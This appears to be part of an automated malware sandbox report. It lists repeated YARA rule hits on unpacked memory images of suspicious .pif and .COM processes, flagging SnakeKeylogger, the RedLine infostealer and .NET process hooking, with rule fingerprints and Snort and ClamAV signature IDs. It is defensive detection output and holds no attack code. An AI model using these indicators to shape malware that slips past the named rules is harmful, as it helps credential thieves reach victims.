              Source: 16.2.xzeheenC.pif.2dcd0f08.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.226c0f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.226c0f08.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.34ca0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.34ca0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2dcd0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2dcd0000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.3.xzeheenC.pif.2991aba0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.3.xzeheenC.pif.2991aba0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.2.xzeheenC.pif.2c596478.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2c596478.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.25170000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.25170000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2c5ce790.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2c5ce790.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.226c0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.226c0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.222bb98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.222bb98e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.2.xzeheenC.pif.2dcd0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2dcd0000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.34ca0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.34ca0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.34d20000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.34d20000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.3255b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.3255b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.3255c896.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.3255c896.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.222bc896.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.222bc896.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 26.2.xzeheenC.pif.222bb98e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.222bb98e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.34d20000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.34d20000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.3399e790.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.3399e790.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.237be790.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.237be790.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2b37c896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2b37c896.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 26.2.xzeheenC.pif.237be790.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.237be790.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.3.xzeheenC.pif.2072dd00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.3.xzeheenC.pif.2072dd00.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 18.2.Cneehezx.PIF.21496c78.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 22.3.xzeheenC.pif.30aaea30.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.3.xzeheenC.pif.30aaea30.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.33965570.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.33965570.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2c595570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2c595570.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.222bc896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.222bc896.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 22.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 26.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.2.xzeheenC.pif.2b37b98e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2b37b98e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.23786478.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.23786478.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2b37b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2b37b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.226c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.226c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.3399e790.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.3399e790.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 10.2.spoolsv.COM.2193c948.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 26.2.xzeheenC.pif.25170000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.25170000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 10.2.spoolsv.COM.219d13d8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 26.2.xzeheenC.pif.23785570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.23785570.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 22.2.xzeheenC.pif.3255b98e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.3255b98e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
